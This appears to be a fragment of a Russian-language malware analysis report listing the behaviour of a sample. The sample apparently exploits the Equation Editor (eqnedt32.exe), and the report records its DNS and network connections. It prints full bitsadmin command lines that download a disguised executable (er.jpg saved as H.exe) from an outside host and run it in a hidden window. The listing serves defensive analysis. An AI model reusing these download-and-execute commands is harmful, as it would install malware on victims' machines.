Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer br /priority foreground https://multi-trexintegfoodsplc.com/csi/er.jpg %USERPROFILE%\H.exe && start %USERPROFILE%\H.exe
- 'mu######exintegfoodsplc.com':443
- DNS ASK mu######exintegfoodsplc.com
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer br /priority foreground https://multi-trexintegfoodsplc.com/csi/er.jpg %USERPROFILE%\H.exe && start %USERPROFILE%\H.exe' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer br /priority foreground https://multi-trexintegfoodsplc.com/csi/er.jpg %HOMEPATH%\H.exe